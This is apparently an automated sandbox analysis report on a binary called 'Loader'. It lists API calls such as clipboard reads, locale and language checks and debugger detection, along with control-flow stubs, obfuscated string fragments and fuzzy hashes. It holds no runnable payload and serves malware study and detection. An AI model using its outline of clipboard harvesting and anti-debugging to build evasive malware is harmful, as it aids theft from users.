                                                                                      • Instruction ID: 6f5871278c2de285bb2fe085768f0866367ca84f7d9b56f2c5d6fe1319dd8f16
                                                                                      • Opcode Fuzzy Hash: 01811f29e235513fc7299bdc820a11077f974d21a0dddd2b594181d633a5cebe
                                                                                      • Instruction Fuzzy Hash: C9E137B1604B028FC724CF25C8916A7B7F2FF46314B19862ED4968B792EB39F845CB54

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 426 43c2a0-43c2d2 LdrInitializeThunk
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(004370F0), ref: 0043C2CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 670Q
                                                                                      • API String ID: 0-369810661
                                                                                      • Opcode ID: 9c71f36bc0503d509e4c0042ae46247c013ffa5cc9855771b124ca34ea316a1e
                                                                                      • Instruction ID: f074675a49b9bbd4516abaab6d571cb18c5723ecd27a76219b0c80a669e3e857
                                                                                      • Opcode Fuzzy Hash: 9c71f36bc0503d509e4c0042ae46247c013ffa5cc9855771b124ca34ea316a1e
                                                                                      • Instruction Fuzzy Hash: 2D41EEB950C3428BD718DF24D85063BBBE1EF89304F04592DF981E7390EB38CA468B5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: D]+\
                                                                                      • API String ID: 2994545307-1174097187
                                                                                      • Opcode ID: 0222fe3cc25219463dfa5335a73e15cc83d74814090df7f252d8b109641b87a0
                                                                                      • Instruction ID: 92c47f246a1912d9ce6ac393dec9d1f9a42c5fc013663cb1112089d2821f752f
                                                                                      • Opcode Fuzzy Hash: 0222fe3cc25219463dfa5335a73e15cc83d74814090df7f252d8b109641b87a0
                                                                                      • Instruction Fuzzy Hash: 04210BB46082508BD724DF18D8E553B7752EB9B324F24AA2DD19377392CB39A803871D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68038a066cb984a5ba95bf4be2f1f54a6e539086d4aa7a49013cdef61b28e75f
                                                                                      • Instruction ID: 437ebbb2b4f94054da2a02d322ddf1b4c79e3307b43b94539e33975bc5451b4e
                                                                                      • Opcode Fuzzy Hash: 68038a066cb984a5ba95bf4be2f1f54a6e539086d4aa7a49013cdef61b28e75f
                                                                                      • Instruction Fuzzy Hash: 3BC1F676A006008FD724CF25DC527A777E2EFDA314F19852EE46A8B3A1EB39E841C715
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cbfaea3652700aad66ae8b5cbffbff1cebb5127eef7bc5127a17907e3000bec5
                                                                                      • Instruction ID: 1b9fdb06d0ddfcab731a8e18f0e14a63b1898920f8ed6076c53237a48bd52106
                                                                                      • Opcode Fuzzy Hash: cbfaea3652700aad66ae8b5cbffbff1cebb5127eef7bc5127a17907e3000bec5
                                                                                      • Instruction Fuzzy Hash: EC31C4347993409FE3188B65DCD17AFB7A1EBD2310F58AA3DE185276C1C5799C028B0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6ffe3f958ae392c03cc8c0cfd7b693633d152322348625adce922c71a808d30
                                                                                      • Instruction ID: 01a8cc9eb6bda5fc05a3dc8a3e4edf4114d6fe1a3f591cca72f61784f32046ce
                                                                                      • Opcode Fuzzy Hash: a6ffe3f958ae392c03cc8c0cfd7b693633d152322348625adce922c71a808d30
                                                                                      • Instruction Fuzzy Hash: 5801F9B46481408FEB089F18E8E183B3352EB5B319F24253DD693D3352D734A8028B1D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 292 40c8a8-40c8eb CoInitializeSecurity * 2
                                                                                      APIs
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8BA
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 640775948-0
                                                                                      • Opcode ID: b4296f5bf66217401610cdcfa1a296523d49720095e68a319450dc3b0167478d
                                                                                      • Instruction ID: 8553e90f594387f5b7c332de2aa1a3faf241ec2240f940421d84c046d4fe9155
                                                                                      • Opcode Fuzzy Hash: b4296f5bf66217401610cdcfa1a296523d49720095e68a319450dc3b0167478d
                                                                                      • Instruction Fuzzy Hash: 59E01CB97C8300BEF6B89B04EC17F0036159B86F22F344328B3623DAE5CAE03200860C

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 0043CF7D
                                                                                      • GetForegroundWindow.USER32 ref: 0043CF8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ForegroundWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2020703349-0
                                                                                      • Opcode ID: 33eef3dcdfb26379f6be174b626c5b8d1e0915bcc50e2dda3ce55e029a2f1faf
                                                                                      • Instruction ID: fc7cb0c6c49eba1f3d744f614275574fac1fc89cab4a0a90c5814eec625feefd
                                                                                      • Opcode Fuzzy Hash: 33eef3dcdfb26379f6be174b626c5b8d1e0915bcc50e2dda3ce55e029a2f1faf
                                                                                      • Instruction Fuzzy Hash: 05D05EFCE011005FD604AF2AEC0A8073719AF463697044838E80382322DB35A409C68A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 43521a-43526d call 43dd10 call 414a70 * 2 GetUserDefaultUILanguage 416 43526f-435272 409->416 417 435274-4352b6 416->417 418 4352b8-4352e9 416->418 417->416
                                                                                      APIs
                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 00435246
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultLanguageUser
                                                                                      • String ID:
                                                                                      • API String ID: 95929093-0
                                                                                      • Opcode ID: c0a0c0911acf6f15958a14286c97cb6080223a5dc4b29cfb9a85d562d90a8222
                                                                                      • Instruction ID: afb7a35382593c5cfd126aaf40fb98ff04a22a634163e15ad0bc91d0e6d8dc7e
                                                                                      • Opcode Fuzzy Hash: c0a0c0911acf6f15958a14286c97cb6080223a5dc4b29cfb9a85d562d90a8222
                                                                                      • Instruction Fuzzy Hash: 3E215032E051568FCB24DF7C9C416EEBBB25F89310F1942EDD49DA73D2CA3449408B95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 419 43a770-43a77c 420 43a783-43a799 call 43d960 RtlFreeHeap 419->420 421 43a7a2-43a7a3 419->421 422 43a7a0 419->422 420->422 422->421
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0043C28B,?,0040B4B5,00000000,00000001), ref: 0043A78E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: caabfcaa72e5470946f6ca4427926c84bcda5f54ce375479d517c0aabd71c446
                                                                                      • Instruction ID: 4992db4bc432bda74488e6d5c5d257cd7b61755a4dfdc40978b602ad18c53902
                                                                                      • Opcode Fuzzy Hash: caabfcaa72e5470946f6ca4427926c84bcda5f54ce375479d517c0aabd71c446
                                                                                      • Instruction Fuzzy Hash: 3BD09E39549122EFD6105B18FC06B563E989F0A321F0344A1A848AB176C734DC518AD8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 425 40c860-40c890 CoInitializeEx
                                                                                      APIs
                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C873
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 4bbf24a5438f130a95e33c4d49483ab2f32870fdbb1ee9ea91f436b5ec706ad2
                                                                                      • Instruction ID: 08ea482de330e3238874b3a9957b5d4c760d97408fd99f55b8527d5335e22217
                                                                                      • Opcode Fuzzy Hash: 4bbf24a5438f130a95e33c4d49483ab2f32870fdbb1ee9ea91f436b5ec706ad2
                                                                                      • Instruction Fuzzy Hash: 44D0A7755945046BD248AB1CEC07F12761CD743B96F500239B3E2D65E2DD10A914C6B9
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,A7A6D65C,?,004088B3,A7A6D65C), ref: 0043A760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 9a71f785e5f83bbddcf320f482abdcd2a7aaa0805318461480f8c559e6873ef3
                                                                                      • Instruction ID: e3b2aa9a3abd178e587d450ef89c5e13b01d6372c04cfc1ad517f247157b9b3d
                                                                                      • Opcode Fuzzy Hash: 9a71f785e5f83bbddcf320f482abdcd2a7aaa0805318461480f8c559e6873ef3
                                                                                      • Instruction Fuzzy Hash: C2C09B35545121ABD6102B15FC05FCA3F58DF49361F020055B50477072C770FC51C7D8
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                      • String ID: $#$%$/$0$0$1$2$3$4$X$v
                                                                                      • API String ID: 1006321803-4221430632
                                                                                      • Opcode ID: 414a686b483cfe36d44214dfc66855fae38711ae9d7862b2f205d028e1e2f7ff
                                                                                      • Instruction ID: c862db148c6d63be707517a6193e86b852bced081a1d957933f243d26aa1f3d6
                                                                                      • Opcode Fuzzy Hash: 414a686b483cfe36d44214dfc66855fae38711ae9d7862b2f205d028e1e2f7ff
                                                                                      • Instruction Fuzzy Hash: 20417DB050C3818ED301AF78954936FBFE09F95318F04493EE4C5862A2D7BD9689C797
                                                                                      APIs
                                                                                        • Part of subcall function 0043C2A0: LdrInitializeThunk.NTDLL(004370F0), ref: 0043C2CE
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0041A859
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0041A8BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                                      • String ID: "@%F$;H N$;T9Z$=D$J$[X$aP5V$xL{R
                                                                                      • API String ID: 764372645-251327352
                                                                                      • Opcode ID: fc43720ec403cf51c5b4529f7fc9ba6790b0a4f7fe5c1d377fe66c45ce06bdbc
                                                                                      • Instruction ID: 03bf701f966d31ab4d2894af23fc97065e7027e7f3383c824c27777bf846b30c
                                                                                      • Opcode Fuzzy Hash: fc43720ec403cf51c5b4529f7fc9ba6790b0a4f7fe5c1d377fe66c45ce06bdbc
                                                                                      • Instruction Fuzzy Hash: 5C8238746093409FD7208B24C9847AFBBE2EBD6718F14892EE4C587352D779DC928B4B
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427479
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: r$!r$t"$w$vB
                                                                                      • API String ID: 237503144-3055660046
                                                                                      • Opcode ID: 7d0edabe9c9f95fff00816c39e9945e7527186e0a0bfea8e3be311cf868e62f0
                                                                                      • Instruction ID: 413422fcd9f9314c72f22e3ad5f65b93cad865c5eee6eda8384dd01edf4a3395
                                                                                      • Opcode Fuzzy Hash: 7d0edabe9c9f95fff00816c39e9945e7527186e0a0bfea8e3be311cf868e62f0
                                                                                      • Instruction Fuzzy Hash: 89C124B5A08351CFD7149F24D84161FBBE1FBC5714F444A2DE994A7292DB34E805CB8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$-$7$7$>$L$L$P$W$[$m
                                                                                      • API String ID: 0-2182735278
                                                                                      • Opcode ID: 5357215534a1a8570556cfb1352fb85abd795972e7adea89fb09911bb4632e42
                                                                                      • Instruction ID: b665256441219ae1a62651b8d4155c49eefb60a1246e5cbd2a092f8878f86c97
                                                                                      • Opcode Fuzzy Hash: 5357215534a1a8570556cfb1352fb85abd795972e7adea89fb09911bb4632e42
                                                                                      • Instruction Fuzzy Hash: B771081250C7D29AD312963C485425BEFD10BE7224F1EDEAEE4E6973C2C169C84AC767
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$*Shi$DTVV$JSQC$J_\e$_P\R$iWDB$klSm$wJsU$x
                                                                                      • API String ID: 0-240862410
                                                                                      • Opcode ID: 877db8cd815b655c7ede9538c6130a79155d4ed28d0a612c99b808fbe52db10a
                                                                                      • Instruction ID: 8c163065db76bf25daad15ae668b4448e05c48e09220af6e5f217c2f1afa0463
                                                                                      • Opcode Fuzzy Hash: 877db8cd815b655c7ede9538c6130a79155d4ed28d0a612c99b808fbe52db10a
                                                                                      • Instruction Fuzzy Hash: 4F524A7450C3908FC721CF26D8407AFBBE1AF95304F088A6EE8D55B392D7398945CB5A
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 002C762F
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002C766D
                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002C7680
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 002C76C8
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 002C76E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                      • String ID: P.USA
                                                                                      • API String ID: 415426439-1155953425
                                                                                      • Opcode ID: c2bf2b69d15c301f4b5f3fe5f7e54ed4af9a5c184505a7c4a6d2c1ffe27fac9c
                                                                                      • Instruction ID: 1e4ae9939acd59a940f4c2a32a3a8162ad55602b8553b2fc879339d3d172f35b
                                                                                      • Opcode Fuzzy Hash: c2bf2b69d15c301f4b5f3fe5f7e54ed4af9a5c184505a7c4a6d2c1ffe27fac9c
                                                                                      • Instruction Fuzzy Hash: 88517471A2460A9BDB11DFA5CC85FBEB3B8BF08700F54466DE905D7190E7709924CF60
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 27B5BB0BA1EF35CB3322221C92AB110C$C@$EVA^$UJVM$]NGD$xO$xr$}w
                                                                                      • API String ID: 0-39559990
                                                                                      • Opcode ID: 18aaf7660f8605b4eb2d8ef0d0f22e4ad496b7b76f36b2428033480217871416
                                                                                      • Instruction ID: e85339b9ce3e5d3a51de321619f6e7cf8909d870ce3ed7710f08b4f326bf092c
                                                                                      • Opcode Fuzzy Hash: 18aaf7660f8605b4eb2d8ef0d0f22e4ad496b7b76f36b2428033480217871416
                                                                                      • Instruction Fuzzy Hash: 50B114B160C3408FD718DF659851A7FBBE5EBD2314F14893EE4E29B382DA388505CB5A
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,002C765D,?,00000000), ref: 002C7D40
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,002C765D,?,00000000), ref: 002C7D69
                                                                                      • GetACP.KERNEL32(?,?,002C765D,?,00000000), ref: 002C7D7E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      • Opcode ID: 2d05074db226e74bf87e448518913a3b56a8cd310ec68aa4c9c022ed7bfc94d7
                                                                                      • Instruction ID: 904211894d4de61cdca3c8560af11194dc971622c4d18b1901ebc8ecd7eaab86
                                                                                      • Opcode Fuzzy Hash: 2d05074db226e74bf87e448518913a3b56a8cd310ec68aa4c9c022ed7bfc94d7
                                                                                      • Instruction Fuzzy Hash: D621C132628147A7EB348F25C900FA773A6EF54B50F56826CE80BDB114E772DE61CB90
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428B05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: -NL$4FD$V T
                                                                                      • API String ID: 237503144-2294908468
                                                                                      • Opcode ID: 8deb48555407afbd8769a37911b9ff45232da72eb52c04fe9c2b4ef496a32ddb
                                                                                      • Instruction ID: 3011e85b28844833365129e087f284c12d284813c4cde7633ec4a4c9c0b4019e
                                                                                      • Opcode Fuzzy Hash: 8deb48555407afbd8769a37911b9ff45232da72eb52c04fe9c2b4ef496a32ddb
                                                                                      • Instruction Fuzzy Hash: AA4130B12093908FD700CF24A891AAFBBE1FBC2704F51492DF5919B29ADB70D402CB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2acc4a95594b0cc3dae83bbb4bbb2394bfb15ac2bff7a19afe3f152f10eb15a3
                                                                                      • Instruction ID: ca70cbe2e87da77fe8fec5a81b5f9d53ff74a00a49ace3b5f0d6204c995dd3d8
                                                                                      • Opcode Fuzzy Hash: 2acc4a95594b0cc3dae83bbb4bbb2394bfb15ac2bff7a19afe3f152f10eb15a3
                                                                                      • Instruction Fuzzy Hash: 52023971E1021ADBDF14CFA9C9C0BAEFBB1FF48314F24826DD919A7241D771AA518B90
                                                                                      APIs
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C8379
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 92a13e108286c35b433fff7316341fde58835b34cf22be07d905596b9f3be97e
                                                                                      • Instruction ID: 7f9f13ce67cf6ed000fff42ba758117e3ab856ddfd72259e348ca111c13a17cc
                                                                                      • Opcode Fuzzy Hash: 92a13e108286c35b433fff7316341fde58835b34cf22be07d905596b9f3be97e
                                                                                      • Instruction Fuzzy Hash: F471E27185116A9FDF24EF248C8DFAEBBB8AB05300F1482DEE40997211EF304EA58F10
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002B64AB
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 002B6577
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B6590
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 002B659A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 6729b761a8e75004d8e274034cd194d4f4bb5d2a5bf4da703f80a3c22ef2fd49
                                                                                      • Instruction ID: 6da017b0df496006466afd9b341bc69aa25255eef15b3613fe77c27fbcbc1697
                                                                                      • Opcode Fuzzy Hash: 6729b761a8e75004d8e274034cd194d4f4bb5d2a5bf4da703f80a3c22ef2fd49
                                                                                      • Instruction Fuzzy Hash: 0E31F7B5D412299BDF20DFA4D98D7CDBBB8EF08340F1041AAE40CAB250EB749A94CF45
                                                                                      APIs
